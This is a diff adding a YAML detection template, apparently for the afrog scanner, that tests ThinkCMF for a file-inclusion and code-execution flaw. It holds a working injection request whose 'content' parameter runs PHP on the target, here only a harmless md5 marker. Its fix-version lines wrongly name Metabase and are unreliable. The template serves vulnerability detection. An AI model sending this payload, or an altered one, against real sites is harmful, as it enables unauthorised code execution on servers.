■ ■ ■ ■ ■ ■
pocs/temp/afrog-pocs/vulnerability/thinkcmf-file-include.yaml
| | 1 | + | id: thinkcmf-file-include |
| | 2 | + | |
| | 3 | + | info: |
| | 4 | + | name: thinkCMF 文件包含 |
| | 5 | + | author: rain |
| | 6 | + | severity: Critical |
| | 7 | + | description: | |
| | 8 | + | 在受影响的版本中,可通过漏洞实现任意文件写入或任意代码执行 |
| | 9 | + | 影响版本: |
| | 10 | + | thinkCMFX 1.6.0-2.2.3 |
| | 11 | + | 修复版本: |
| | 12 | + | metabase version >= 0.40.5 |
| | 13 | + | metabase version >= 1.40.5 |
| | 14 | + | reference: |
| | 15 | + | - https://www.thinkcmf.com/ |
| | 16 | + | |
| | 17 | + | rules: |
| | 18 | + | r0: |
| | 19 | + | request: |
| | 20 | + | method: GET |
| | 21 | + | path: /?a=fetch&templateFile=public/index&prefix="&content=die(@md5(thinkcmf)) |
| | 22 | + | headers: |
| | 23 | + | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 |
| | 24 | + | expression: response.status == 200 && "3bedf9f6e16de1cb5403356aaa7bec38".bmatches(response.body) |
| | 25 | + | expression: r0() |
